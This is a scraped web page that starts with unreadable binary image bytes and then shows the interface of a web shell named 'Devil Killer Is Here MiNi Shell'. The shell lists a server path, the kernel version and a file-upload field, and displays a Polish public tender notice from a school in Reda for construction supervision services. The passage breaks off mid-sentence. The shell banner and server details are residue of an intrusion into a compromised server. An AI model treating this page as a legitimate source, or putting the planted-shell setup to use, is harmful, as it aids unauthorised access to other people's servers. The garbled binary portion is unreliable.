JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240311/0023941701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji Inspektora nadzoru inwestorskiego przy realizacji inwestycji pn. &#34;Budowa kompleksu klasopracowni przy Powiatowym Zespole Szkół w Redzie&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY ZESPÓŁ SZKÓŁ W REDZIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PZS W REDZIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191828653</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Łąkowa 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Reda</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pzsreda.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://pzsreda.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji Inspektora nadzoru inwestorskiego przy realizacji inwestycji pn. &#34;Budowa kompleksu klasopracowni przy Powiatowym Zespole Szkół w Redzie&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d2b39f62-df87-11ee-a01e-f641a8763d5f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00239417</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d2b39f62-df87-11ee-a01e-f641a8763d5f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl. 2. Korzystanie z Platformy e-Zamówienia jest bezpłatne. 3. Adres strony<br/>internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie eZamówienia):<br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-d2b39f62-df87-11ee-a01e-f641a8763d5f 4. Postępowanie można<br/>wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”). 5. Identyfikator (ID)<br/>postępowania na Platformie e-Zamówienia: ocds-148610-d2b39f62-df87-11ee-a01e-f641a8763d5f 6. Wykonawca zamierzający<br/>wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”. 7. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania<br/>nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. 8. Sposób sporządzenia dokumentów elektronicznych lub<br/>dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być<br/>zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów<br/>elektronicznych.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1. Administratorem Pani/Pana danych osobowych jest Powiatowy Zespołu Szkół w Redzie zlokalizowanego przy ul. Łąkowej 38, 84-240 Reda, NIP: 5881874930, REGON: 191828653, adres e-mail: szkola@zspreda.pl; <br/>2. W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych, w następujący sposób - listownie na adres: ul. Łąkowa 38, 84-240 Reda lub za pośrednictwem poczty elektronicznej pod adresem: m.filipowski@filcon-inf.pl. <br/>3. Pani/Pana dane osobowe przetwarzane będą w celu: <br/>a. prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego na „Pełnienie funkcji Inspektora nadzoru inwestorskiego przy realizacji inwestycji pn. „Budowa kompleksu klasopracowni przy Powiatowym Zespole Szkół w Redzie” w trybie podstawowym oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji na podstawie Ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t. j. Dz. U. z 2023 r. poz. 1605), dalej „ustawa Pzp” – zgodnie art. 6 ust. 1 lit. c RODO; <br/>b. realizacji obowiązków wynikających z przepisów podatkowych i rachunkowych, tj. Ustawa z dnia 26 lipca 1991 r. o podatku dochodowym od osób fizycznych, Ustawa z dnia 29 sierpnia 1997 r. - Ordynacja podatkowa, ustawa z dnia 29 września 1994 r. o rachunkowości (Dz. U. 2023 poz. 120), ustawa z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. 2023 poz. 1570), inne przepisy podatkowe oraz archiwizacji dokumentacji – zgodnie z art. 6 ust. 1 lit. c RODO; <br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy oraz okres wniesienia zabezpieczenia należytego wykonania umowy. Okres przechowywania liczony jest od 1 stycznia, roku następnego, od daty zakończenia postępowania i może zostać wydłużony w przypadku powstania roszczeń z tytułu realizacji umowy do czasu ich zakończenia. Po upływie okresu przechowywania dokumentacja niearchiwalna podlega brakowaniu; <br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp oraz Prezes Urzędu Zamówień Publicznych z siedzibą w Warszawie (02-676) przy ul. Postępu 17A jako Administrator Danych Osobowych Użytkowników Platformy e-Zamówienia, na której Powiatowy Zespół Szkół w Redzie prowadzi postępowania o udzielenie zamówienia publicznego, działając pod adresem https://ezamowienia.gov.pl/pl/;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1. Administratorem Pani/Pana danych osobowych jest Powiatowy Zespołu Szkół w Redzie zlokalizowanego przy ul. Łąkowej 38, 84-240 Reda, NIP: 5881874930, REGON: 191828653, adres e-mail: szkola@zspreda.pl; <br/>2. W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych, w następujący sposób - listownie na adres: ul. Łąkowa 38, 84-240 Reda lub za pośrednictwem poczty elektronicznej pod adresem: m.filipowski@filcon-inf.pl. <br/>3. Pani/Pana dane osobowe przetwarzane będą w celu: <br/>a. prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego na „Pełnienie funkcji Inspektora nadzoru inwestorskiego przy realizacji inwestycji pn. „Budowa kompleksu klasopracowni przy Powiatowym Zespole Szkół w Redzie” w trybie podstawowym oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji na podstawie Ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t. j. Dz. U. z 2023 r. poz. 1605), dalej „ustawa Pzp” – zgodnie art. 6 ust. 1 lit. c RODO; <br/>b. realizacji obowiązków wynikających z przepisów podatkowych i rachunkowych, tj. Ustawa z dnia 26 lipca 1991 r. o podatku dochodowym od osób fizycznych, Ustawa z dnia 29 sierpnia 1997 r. - Ordynacja podatkowa, ustawa z dnia 29 września 1994 r. o rachunkowości (Dz. U. 2023 poz. 120), ustawa z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. 2023 poz. 1570), inne przepisy podatkowe oraz archiwizacji dokumentacji – zgodnie z art. 6 ust. 1 lit. c RODO; <br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy oraz okres wniesienia zabezpieczenia należytego wykonania umowy. Okres przechowywania liczony jest od 1 stycznia, roku następnego, od daty zakończenia postępowania i może zostać wydłużony w przypadku powstania roszczeń z tytułu realizacji umowy do czasu ich zakończenia. Po upływie okresu przechowywania dokumentacja niearchiwalna podlega brakowaniu; <br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp oraz Prezes Urzędu Zamówień Publicznych z siedzibą w Warszawie (02-676) przy ul. Postępu 17A jako Administrator Danych Osobowych Użytkowników Platformy e-Zamówienia, na której Powiatowy Zespół Szkół w Redzie prowadzi postępowania o udzielenie zamówienia publicznego, działając pod adresem https://ezamowienia.gov.pl/pl/;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest Pełnienie funkcji Inspektora nadzoru inwestorskiego przy realizacji inwestycji pn. „Budowa<br/>kompleksu klasopracowni przy Powiatowym Zespole Szkół w Redzie”<br/>2. Dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót, zakres prac budowlanych oraz przedmiary<br/>robót są dostępne pod adresem:<br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-10613a9b-b5f0-11ee-a66a-5e0e9a75a9a0<br/>identyfikator postępowania: ocds-148610-10613a9b-b5f0-11ee-a66a-5e0e9a75a9a0<br/>3. Zadaniem inspektora nadzoru będzie wykonywanie wszystkich czynności związanych nadzorem nad prawidłową<br/>realizacją projektu, aby umożliwić osiągnięcie celów projektu w ramach założonego zakresu prac w założonym czasie i<br/>planowanym budżecie.<br/>4. Do obowiązków inspektora nadzoru należy:<br/>a) zarządzanie procesem realizacji inwestycji oraz kierowanie i koordynowanie jej wykonania w formie nadzoru<br/>merytorycznego i technicznego w taki sposób, aby zapewnić zgodność jej realizacji z przepisami ustawy z dnia 7 lipca 1994<br/>r. Prawo budowlane (Dz. U. z 2023 r. poz. 682 ze zm.), przepisami ustawy z dnia 29 stycznia 2004r. - Prawo zamówień<br/>publicznych (Dz.U. z 2023 r. poz. 1605 z późn. zm.), przepisami wykonawczymi do wymienionych ustaw, z promesą<br/>wstępną na dofinansowanie projektu a także z umową z wykonawcą inwestycji,<br/>b) wykonywanie zadań, stosownie do przepisów ustawy Prawo budowlane: inspektora nadzoru inwestorskiego (art. 25, 26),<br/>koordynatora czynności nadzoru inwestorskiego (art. 27),<br/>c) organizowanie i prowadzenie rad budowy, narad projektowych, innych spotkań (narady techniczne, spotkania<br/>uzgodnieniowe itp. organizowane w siedzibie Zamawiającego minimum dwa razy w miesiącu.),<br/>d) weryfikacja i ewentualne uzupełnienie dokumentacji technicznej w celu zgodności realizacji z ustawą Prawo budowlane:<br/>e) sporządzenie cotygodniowego raportu z przebiegu prac podczas realizacji inwestycji (dostarczany w formie mailowej w<br/>każdy piątek na adres e-mail zamowienia@pzsreda.edu.pl), ewentualnie można odejść od sporządzenia cotygodniowego<br/>raportu po wysłaniu e-mail na adres zamowienia@pzsreda.edu.pl w każdy piątek z dopiskiem – brak raportu, po<br/>wcześniejszym każdorazowym ustaleniu jego braku z Zamawiajacym.<br/>f) kontrolowanie prawidłowości prowadzenia dziennika budowy,<br/>g) koordynowanie działań w zakresie realizacji robót budowlanych, ze szczególnym uwzględnieniem pracy na obiektach<br/>czynnych,<br/>h) weryfikacja poprawności sporządzonych przez Wykonawcę dokumentów odbiorowych do stosownych instytucji i organów<br/>w zakresie spełnienia warunków p-poż obiektu oraz dokumentacji przygotowanej do złożenia maksymalnie w terminie 5 dni<br/>roboczych (w razie konieczności aktualizacja powyższej dokumentacji przed złożeniem)<br/>i) bieżące reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i<br/>pozwoleniem na budowę, podpisaną umową z Wykonawcą robót, przepisami prawa i zasadami wiedzy technicznej,<br/>j) sprawdzenie jakości wykonanych robót i wbudowanych materiałów budowlanych, a w szczególności zapobieganie<br/>zastosowaniu materiałów wadliwych i niedopuszczonych do stosowania w budownictwie,<br/>k) sprawdzanie przed zastosowaniem atestów, gwarancji, certyfikatów i deklaracji zgodności materiałów budowlanych z<br/>kryteriami technicznymi określonymi dokumentacją projektową i obowiązującymi przepisami (maksymalnie w terminie 5 dni<br/>roboczych),<br/>l) sprawdzenie kosztorysów ofertowych, kosztorysów będących załącznikiem do protokołów odbioru częściowego,<br/>kosztorysów robót dodatkowych, zamiennych i zaniechanych (maksymalnie w terminie 5 dni roboczych),<br/>m) zatwierdzanie ewentualnych rysunków roboczych wykonawcy inwestycji i dokonywanie niezbędnych korekt tych<br/>rysunków,<br/>n) pełnienie nadzoru autorskiego w całym okresie realizacji inwestycji (udzielanie odpowiedzi w sprawach technicznych,<br/>dokonywanie niezbędnych obliczeń, wykonanie rysunków zamiennych, uzupełniających i wyjaśniających),<br/>o) udzielanie Zamawiającemu odpowiedzi na zapytania, udzielanie informacji i wyjaśnień na temat realizacji inwestycji, a<br/>także przygotowywanie i przedkładanie dokumentów wymaganych przez Zamawiającego - w możliwie najkrótszym terminie<br/>lub w terminie wskazanym przez Zamawiającego,<br/>p) w przypadku przerwania realizacji inwestycji, dokonanie wyceny prac zrealizowanych przez wykonawcę inwestycji przed<br/>zerwaniem kontraktu, dokonanie inwentaryzacji robót w sposób umożliwiający sporządzenie kosztorysu inwestorskiego,<br/>określenie należności dla wykonawcy inwestycji, sporządzenie raportu o realizacji inwestycji, regularne sporządzanie<br/>dokumentacji fotograficznej realizowanej inwestycji, w tym robót ulegających zakryciu bądź zanikających, stanu terenu<br/>objętego inwestycją przed rozpoczęciem robót budowlanych, w trakcie trwania oraz po zakończeniu realizacji inwestycji,<br/>r) sprawdzenie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach<br/>technicznych instalacji, urządzeń technicznych,<br/>s) uczestnictwo w odbiorach częściowych (maksymalny termin trwania odbioru częściowego to 7 dni roboczych) i odbiorze<br/>końcowym,<br/>t) nadzorowanie poprawności i weryfikacja dokumentacji powykonawczej sporządzonej przez Wykonawcę inwestycji oraz<br/>przeprowadzenie wspólnie z Wykonawcą zgłoszenia i uzyskanie pozwolenia na użytkowanie obiektu.<br/>5. Projekt umowy stanowi Załącznik nr 8 do specyfikacji warunków zamówienia.<br/>6. Zamawiającemu przysługują uprawnienia z tytułu gwarancji oraz rękojmi zgodnie z zasadami określonymi w ustawie<br/>Kodeks Cywilny. Więcej w projekcie umowy stanowiącym Załącznik nr 8 do SWZ.7. Wykonawca zobowiązany jest przy wykonywaniu przedmiotu zamówienia do zachowania przepisów ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych. Zgodnie z art. 99 Ustawy Prawo Zamówień Publicznych “Przedmiotu<br/>zamówienia nie można opisywać w sposób, który mógłby utrudniać uczciwą konkurencję, w szczególności przez wskazanie<br/>znaków towarowych, patentów lub pochodzenia(…)”. Wykonawca może podać nazwę materiału lub urządzenia w sytuacji,<br/>gdy jest to uzasadnione specyfiką przedmiotu zamówienia i nie może opisać przedmiotu zamówienia w wystarczająco<br/>precyzyjny i zrozumiały sposób, a wskazaniu 5 takiemu towarzyszą wyrazy „lub równoważny”. Wykonawca zobowiązany jest<br/>wówczas wskazać w opisie przedmiotu zamówienia kryteria stosowane w celu oceny równoważności.<br/>8. Wykonawca zobowiązany jest, zgodnie z art. 100 ust. 1 ustawy Prawo zamówień publicznych, do zapewnienia, aby przy<br/>realizacji przedmiotu zamówienia zostały uwzględnione wymagania w zakresie dostępności dla osób niepełnosprawnych lub<br/>projektowania z przeznaczeniem dla wszystkich użytkowników. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71541000-2 - Usługi zarządzania projektem budowlanym</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Inżyniera Wiodącego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek, jeśli wykaże, że<br/>a) posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 60.000,00 